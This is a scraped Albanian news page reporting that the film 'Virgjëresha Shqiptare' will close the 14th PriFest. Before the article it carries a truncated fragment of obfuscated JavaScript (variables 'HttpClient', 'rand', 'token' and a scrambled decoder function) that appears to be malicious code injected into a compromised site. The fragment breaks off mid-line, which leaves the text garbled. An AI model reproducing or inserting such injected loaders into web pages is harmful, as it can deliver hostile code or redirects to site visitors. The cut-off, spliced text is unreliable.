;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

“Virgjëresha Shqiptare” – filmi që do të mbyll edicionin e 14-të të PriFest

By

“Virgjëresha Shqiptare” do të jetë filmi përmbyllës i edicionit të 14-të të Prifest.

Filmi në regji të Bujar Alimanit, pati premierën botërore vitin e kaluar në Festivalin Ndërkombëtar të filmit në Varshavë ku fitoi edhe dy çmime.

Ngjarja e filmit është e vendosur në Shqipërinë e vitit 1958 dhe është bashkëprodhim mes Shqipërisë, Gjermanisë, Belgjikës dhe Kosovës.

PriFest shënon edicionin e 14-të këtë vit dhe mbahet nga datat 20-25 shtator, për herë të parë pa drejtoreshën e festivalit Vjosa Berisha e cila ndërroi jetë me 23 qershor të këtij viti. Ky edicion do të jetë në kujtim dhe nderim të saj. /Prive.al

 

Artikuj të ngjashëm